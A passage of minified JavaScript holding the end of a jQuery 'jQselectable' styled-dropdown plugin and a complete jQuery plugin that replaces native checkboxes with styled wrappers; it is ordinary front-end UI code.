var _dl=$('<dl/>');for(var i=0;i<_optgroup.length;i++){var _dt=$('<dt/>');_dt.text($(_optgroup[i]).attr('label'));var _dd=$('<dd/>');for(var j=0;j<_option[i].length;j++){generate_anchors($(_option[i][j]),_dd);}
_dl.append(_dt).append(_dd);}
this._div.append(_dl).addClass('optg');$('div',this.mat).append(this._div);}else{this.mat.addClass('nooptgroup');var _option=$('option',this.target);for(var i=0;i<_option.length;i++){generate_anchors($(_option[i]),this._div);}
$('div',this.mat).append(this._div.addClass('nooptg'));}
if(!this.generatedFlg){$('body').append(this.mat);this.mat.addClass('sctble_mat').css({position:'absolute',zIndex:1000,display:'none'});$('*:first-child',this.mat).addClass('first-child');$('*:last-child',this.mat).addClass('last-child');}
if(document.all&&typeof document.body.style.maxHeight=='undefined'){if(this.conf.height<this.mat.height()){$(this._div).css('height',this.conf.height);}}else{$(this._div).css('maxHeight',this.conf.height);}},bind_events:function(){var _this=this;var is_called=true;var set_pos=function(){var _pos=_this.m_input.offset();_this.mat.css({top:_pos.top+_this.m_input.height()*1.3+_this.conf.top,left:_pos.left+_this.conf.left});}
var mat_hide=function(){var _mat=$('.sctble_mat');switch(_this.conf.out){case'slideUp':_mat.slideUp(_this.conf.outDuration);break;case'fadeOut':_mat.fadeOut(_this.conf.outDuration);break;default:_mat.hide();break;}}
var mat_show=function(){mat_hide();switch(_this.conf.set){case'slideDown':_this.mat.slideDown(_this.conf.setDuration).css('opacity',_this.conf.opacity);break;case'fadeIn':_this.mat.css({display:'block',opacity:0}).fadeTo(_this.conf.setDuration,_this.conf.opacity);break;default:_this.mat.show().css('opacity',_this.conf.opacity);break;}
var _interval=isNaN(_this.conf.setDuration)?null:_this.conf.setDuration+10;if(_interval==null){if(_this.conf.setDuration.match(/slow/)){interval=610;}else if(_this.conf.setDuration.match(/normal/)){interval=410;}else{interval=210;}}
var _chk=setInterval(function(){$('a.selected',_this.mat).focus();clearInterval(_chk);},_interval);}
this.m_input.click(function(event){set_pos();$(this).addClass('sctble_focus');$('a.sctble_display').not(this).removeClass('sctble_focus');mat_show();event.stopPropagation();return false;}).keyup(function(event){if(is_called){set_pos();mat_show();event.stopPropagation();}else{is_called=true;}});this.mat.click(function(event){event.stopPropagation();});$('body,a').not('a.sctble_display').click(function(event){$('a.sctble_display').removeClass('sctble_focus');mat_hide();}).not('a').keyup(function(event){if(event.keyCode=='27'){$('a.sctble_focus').removeClass('sctble_focus');is_called=false;_this.m_input.blur();mat_hide();}});$('a',this.mat).click(function(){var self=$(this);_this.m_text.text(decodeURI(self.attr('href').split('#')[1]));$('option[value="'+self.attr('name')+'"]',_this.target).attr('selected','selected');$('.selected',_this.mat).removeClass('selected');self.addClass('selected');_this.m_input.removeClass('sctble_focus');is_called=false;mat_hide();if(_this.conf.callback&&typeof _this.conf.callback=='function'){_this.conf.callback.call(_this.target);}
_this.m_input.focus();return false;});$('label[for="'+this.attrs.id+'"]').click(function(event){set_pos();_this.m_input.addClass('sctble_focus');$('a.sctble_focus').not(_this.m_input).removeClass('sctble_focus');mat_show();event.stopPropagation();return false;});}}
$.fn.jQselectable=function(options,temp){if($(this).length>1){var _instances=[];$(this).each(function(i){_instances[i]=new jQselectable(this,options,temp);});return _instances;}else{return new jQselectable(this,options,temp);}}
if(!jQuery.fn.selectable){$.fn.selectable=$.fn.jQselectable;}})(jQuery);;(function($){var i=function(e){if(!e)var e=window.event;e.cancelBubble=true;if(e.stopPropagation)e.stopPropagation()};$.fn.checkbox=function(f){try{document.execCommand('BackgroundImageCache',false,true)}catch(e){}var g={cls:'jquery-checkbox',empty:'/public/frontend/default_template/images/empty.png'};g=$.extend(g,f||{});var h=function(a){var b=a.checked;var c=a.disabled;var d=$(a);if(a.stateInterval)clearInterval(a.stateInterval);a.stateInterval=setInterval(function(){if(a.disabled!=c)d.trigger((c=!!a.disabled)?'disable':'enable');if(a.checked!=b)d.trigger((b=!!a.checked)?'check':'uncheck')},10);return d};return this.each(function(){var a=this;var b=h(a);if(a.wrapper)a.wrapper.remove();a.wrapper=$('<span class="'+g.cls+'"><span class="mark"><img src="'+g.empty+'" /></span></span>');a.wrapperInner=a.wrapper.children('span:eq(0)');a.wrapper.hover(function(e){a.wrapperInner.addClass(g.cls+'-hover');i(e)},function(e){a.wrapperInner.removeClass(g.cls+'-hover');i(e)});b.css({position:'absolute',zIndex:-1,visibility:'hidden'}).after(a.wrapper);var c=false;if(b.attr('id')){c=$('label[for='+b.attr('id')+']');if(!c.length)c=false}if(!c){c=b.closest?b.closest('label'):b.parents('label:eq(0)');if(!c.length)c=false}if(c){c.hover(function(e){a.wrapper.trigger('mouseover',[e])},function(e){a.wrapper.trigger('mouseout',[e])});c.click(function(e){b.trigger('click',[e]);i(e);return false})}a.wrapper.click(function(e){b.trigger('click',[e]);i(e);return false});b.click(function(e){i(e)});b.bind('disable',function(){a.wrapperInner.addClass(g.cls+'-disabled')}).bind('enable',function(){a.wrapperInner.removeClass(g.cls+'-disabled')});b.bind('check',function(){a.wrapper.addClass(g.cls+'-checked')}).bind('uncheck',function(){a.wrapper.removeClass(g.cls+'-checked')});$('img',a.wrapper).bind('dragstart',function(){return false}).bind('mousedown',function(){return false});if(window.getSelection)a.wrapper.css('MozUserSelect','none');if(a.checked)a.wrapper.addClass(g.cls+'-checked');if(a.disabled)a.wrapperInner.addClass(g.cls+'-disabled')})}})(jQuery);
